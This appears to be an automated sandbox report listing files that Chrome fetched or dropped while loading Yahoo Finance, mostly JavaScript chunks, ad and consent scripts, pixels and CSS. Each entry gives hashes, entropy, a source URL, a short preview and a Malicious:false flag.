                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as G,e as T,b as me,t as p,d as k,f as I,i as g,j as Ee,h as A,q as y,U as Le,k as m,l as D,n as E,m as ue,p as w,H as pe,z as Ae,A as se,T as Ne,B as ge,N as De}from"./scheduler.Dr9AAxFe.js";import{S as H,i as V,c as J,b as x,m as $,t as b,a as P,d as ee,g as Re,e as Se}from"./index.DCSmZEjO.js";import{N as Oe,t as ce,n as be,P as ye,Q as ve,g as we,u as Ge,a_ as Te}from"./commonUtil.CI22_Irn.js";import{j as He,i as Ve}from"./quoteUtil.DBZgD1yl.js";/* empty css */import{S as Be}from"./StatusTag.DpPy7_Xv.js";import{R as ke,a as Ue,S as Fe}from"./StarRating.DpC97Zrz.js";import{C as Pe}from"./Change.CEp_qEmJ.js";import{a as Ye,C as ze,T as Ie}from"./CompanyName.CyacQrt2.js";import{P as We,T as Ke,a as de,E as qe,b as Ze,S as je,c as Xe}from"./Table.B31n1-9U.js";import{g as he,a as Qe}from"./spread.CgU5AtxT.js";import{P as oe}from"./PortfolioSymbolCount.svelte_svelte_type_style_lang.EL5Zj2tO.js";import{B as Je}from"./Button
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.240239117404927
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JS+DgWAsDQAfn:88UsDpn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C26019C2D1F82BB418B2A56B2BACB59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B11220F5F962FAECC8E9835210C78EA7F87993BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:09343D3B3473E1C994B2D603C99FEB8A0F63FBD3FF20BE7432FF18B973DBE651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AE42A74AE1E4AAEDA412ABBEFF6D9072A216C37CE343B103EE5FBABCD58EB9FE4CA7D4AE69D8EDD496F0F3793FBA03FBE7EE7B5C80A6AAE30D1E12B08D53CE9D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:PubMatic.PugMasterCallback(false, false, true);
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1030)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.239216717577353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:kIbcMnLZdnRRBaWR3RAtIs6QDya3LttNabQ3vzLV5OisyTwDJ5:kUjVdnRRBaWhkT3xObQXVQ7UwDJ5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D33DA22382528DB6C0E1A8097793F52A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FB991F77BDFE283D86A754F72386958DD4E4E505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4CD006C2A1260ED66661C791737352F7E903F928AC56CB21BB98A09A03E7F986
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2832FF5E47748F0FAC0EC0677D5F5A316A6C684C326E4B44A85E4D5E2B647E053279E89B1A1CA2AF4C21762DBFDE988DAA1EBC84C451FAF8832705B2DE9BEFBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadTrendingTickers.BmFT6E7u.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{d as T,e as k}from"./commonUtil.CI22_Irn.js";import{f as m,l as h}from"./logUtil.hOue7iAU.js";async function w(i,{count:a=25,silent:n=!1,quoteType:o="ALL",force:t=!1,critical:l=!1,fields:u=[]}){var f,d;const[e]=await T(["trendingTickers"],i),g=await k(i);if(e.getTrendingTickers().length>=a&&!t)return e.getTrendingTickers();try{const r=await m(i,{pathname:`/v1/finance/trending/${(g==null?void 0:g.region)||"US"}`,perfLabel:"loadTrendingTickers",query:{count:typeof a=="number"?String(a):a,fields:["logoUrl","longName","shortName","regularMarketChange","regularMarketChangePercent","regularMarketPrice",...u].join(","),format:"true",useQuotes:"true",quoteType:o}}),{result:s,error:c}=(r==null?void 0:r.finance)||{};return c||!s?(e.setError(c),null):(n||e.updateTrendingTickers((f=s[0])==null?void 0:f.quotes),n||t?(d=s[0])==null?void 0:d.quotes:e.getTrendingTickers())}catch(r){if(h(i,{count:a,silent:n,force:t,quoteType:o},{data:r,perfLabel:"loadTrendingTickers",isCritical:l}),n||e.setError
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6645), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):6645
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.153971139811532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3e4uADK8v5xzWosWjYugPwNC96vTrWJcXux8jVD:3qA+8nWofjYFPwo6vTrq0uep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2E3968239B770B8186BB480D513311CD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:E2583E321454F9F48193918E3316533226ED62FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D77E659299C397037513AFF88093B64F6CE29994B94D99256AD84A7910C0CEB3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:487F486C165C5E6FAD46A8BBCB6279147FA93D3D3A004327D0DFDEA5040F9B320FE5439A0E2E849DFBB8CBB4FC1ADFDF6647BCCA1DDECCAAD5C36093FCE7A2B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-image",[],t):"object"==typeof exports?exports["wafer-image"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-image"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(a){if(r[a])return r[a].exports;var o=r[a]={i:a,l:!1,exports:{}};return e[a].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,a){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:a})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):135694
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3853964684271745
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:+vS1l7wQ17UbvvQwOc7BZo+VnZeSMmnLZOtwTMQNr25v5kIdkIdIZSUJy5NAcRaj:+E7wQ170vmuejP1bk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C4854AB580A27AB99454693D41ACFB8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:21B43EBF4EC3D74FE50C2EC03D7D7535932FB3C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:13BB6679641CBA6E8CE7A6C7B683A59C48B6D2F1165BD3015B00FF7AE47DDABE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2C20EF0FDAD10BEDE9A6E91F3E3736E268732A558072DF191DF299F23469E139CBF934617F4D9D2FA60DD82FF499AC34EDCBD83A2D457951C39785AC15370A21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/oa/consent.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! For license information please see consent.js.LICENSE.txt */.!function(){var e={6848:function(e,n,t){var o,i,a;!function(s){"use strict";if(null!=n&&"number"!=typeof n.nodeType)e.exports=s();else if(null!=t.amdO)i=[],void 0===(a="function"==typeof(o=s)?o.apply(n,i):o)||(e.exports=a);else{var r=s(),c="undefined"!=typeof self?self:$.global;"function"!=typeof c.btoa&&(c.btoa=r.btoa),"function"!=typeof c.atob&&(c.atob=r.atob)}}((function(){"use strict";var e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";function n(e){this.message=e}return n.prototype=new Error,n.prototype.name="InvalidCharacterError",{btoa:function(t){for(var o,i,a=String(t),s=0,r=e,c="";a.charAt(0|s)||(r="=",s%1);c+=r.charAt(63&o>>8-s%1*8)){if((i=a.charCodeAt(s+=3/4))>255)throw new n("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");o=o<<8|i}return c},atob:function(t){var o=String(t).replace(/[=]+$/,"");if(o.length%4==1)throw new n("'atob' failed: The str
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.141224508910417
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:DdTCIsqDmJS4RKb5ykKcvXjXRHoNcHxIjIRuAdSewD:D59mc4sl3O4UKxO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:79FF1942D2AC137CC43949E74FB9284E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:53B152950469C4BC8EA242A534D5EBACB21F408D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5B558A0B664276A90837F96BC3A66228318C68A502ACB89C6680EB01C90C06DE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:012D33A667E72C9754DA88FCDE3DE3446B056BD44F88C1036481613DEF632D513EE000675C464CEBAEDE8A4060FED3F171B68BE22369A50BA725A02D24F9E6D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const v='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 13h-6v6h-2v-6H5v-2h6V5h2v6h6z"/></svg>';export{v as A};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):151
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163268856699254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcHgqOa4JRVFiAdFUvuIIpAdSbF7ev:H69mc4sl3O4gy49FRF0ulS2ev
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3981EFFEFE7AE873DA6E6BDEF640B7A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:A36BC42AA70A751143C873C50633C4E82F7C0751
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FB5D1FB998385170F1C64F554B00225B899B03B7EA6B9DC1ACB5139F820A8EEA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:354675FDDB540EF73C6375245E87331D67A67F15C1624FCFB515FE6837D821EE3F3FB80FC4E2745ECB4A92C5C72C2393C85DDBE559CB5EEB9CEC30EE3DD45B2E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M7.41 15.41 12 10.83l4.59 4.58L18 14l-6-6-6 6z"/></svg>';export{s as U};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3515)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):211298
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.434411940022077
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:6BlfMmPe6JLCBlSRsJrNZNK9GeMxyW+Uz:wfaBIdUz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:13A1FFD3CD55B5190099ABD43F852E3F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:806CF9D1FD4EB9D8E7252742D3763BC36AC28601
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4BBF8D79E9316F74717CEFA88DE54ADDEDD9BC1B95F21E3B239BC287C5B44F67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:FC49667697E34376CBA81E87E52CA2F9FC36330929A3B3E4E2042074C8027151B93A5D1D87094AF600143504870EE2F66DC04BA879A921B89088BC0A7FC30D7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/pagead/managed/js/activeview/current/ufs_web_display.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},p=ca(this),.u=function(a,b){if(b)a:{var c=p;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.u("Symbol",function(a){if(a)return a;var b=function(f,g){this.sg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.sg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e)t
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://pagead2.googlesyndication.com/pagead/gen_204?id=xbid&dbm_b=AKAmf-A1S1Rxiez91xPypcv_6hRSEG56EEF0sD6tb9FlWpBqH9etmlJiUqUngGd2AeGzBKCqXKXMBCDD-A04MfUNumkjim2WlgsIYcjJeK58P8ptkNsl4GA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):109055
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7561394862931934
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:GbA7Ls5Mm2hV5Mp9ShW0wJ8XvEZavQDOi15AobQoI01Jx9+gm6G3refUrKJMOtVv:buf
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:187B10448C132E490567449C7864FA09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:15FC9C9E805255ED6EF0EF097CFAD288FB066250
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2CE1703CB901C5EAA08C56AC935D5EBCCEE55F031C108D2E3007F77EFBE277BB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1FBCA7679B362D1C1BD966F8849BF4580D31F01C95D4CBD38E73863BFE9DD44FA54D420C538A21653B21510F2368724FA6E086008E1ACE9D847EC40AEDC7AC2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{. "prebid": {. "adUnits": {. "us_yfin_main_dt_btm_center": {. "pos": 3,. "formats": {. "banner": {. "sizes": [. [. 728,. 90. ],. [. 970,. 250. ]. ]. }. },. "bidders": {. "yahooPrebidServer": {},. "yahooAds": {. "pos": "us_yfin_main_dt_btm_center". },. "pubmatic": {. "adSlot": "5537303". },. "rubicon": {. "zoneId": "3156558". },. "ix": {. "siteId": "1057906
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (342)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):343
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.7715964339300605
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:aDEvXC2f1G0vXtVTvXvwRevX8V3qYOLXhLqUCo3c7W3OLXhL2eNvwR+:aDEfN9FftVTfZf8V3qYkXhWUb3WW3kXH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:65ED963B2141D21177148FC652DE8827
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8A3445A1B66EBBD8BEEA882A5D92D727AA09B000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:5AFDC25D22BB946EB262F0D81D15F62EC84AF5E6616393436A07FDF4513C6633
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8A0AA4A70BB2A5BA3DE8D35590179F2A654A799C1A646E82C5BBD65AF98B97CD2F189497CD4F1F987EDBDC3F7267A235A0D71B60C16E2327F6D517B1D2B0D3FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/assets/PositionDeleteMessage.B-8pT6wm.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:h2.yf-t1mb2n.yf-t1mb2n{font-size:var(--font-3xl);font-weight:var(--font-bold)}h2.yf-t1mb2n.yf-t1mb2n,p.yf-t1mb2n.yf-t1mb2n{line-height:1.25}.title.yf-t1mb2n.yf-t1mb2n{margin-bottom:var(--space-4)}.isDock.yf-t1mb2n .title.yf-t1mb2n{font-size:var(--font-l);padding-bottom:var(--space-2)}.isDock.yf-t1mb2n .description.yf-t1mb2n{line-height:1.5}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (29594), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):29594
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.176931694017593
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:U9ohsHpxsgDD9G9uiQ9xYBEgH5CDE486Cfiniln7dB1Qg7Nx6/SRRzLC78eA1bOr:U4gDRNgtmSiniln7dB1QSm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4B4808C249D200DF8BCDB043AC4611
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:80F6F690F592E8E1975CB27B9281B6F49FA81C66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:117A49648BFB149AE0636D4C6397DADBE8AAAB4EE5BB8A35DB9318379B7F6CA2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BD1124DD9EADDB5B10AAF23C4D270C06A4FF98C15542F38D7C878EE7DD4947EC42FB54838A5B8E2F3C5D80B0086503CE16BBB157F630C517998EA1646C05234E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-autocomplete-1.31.8-modern.js
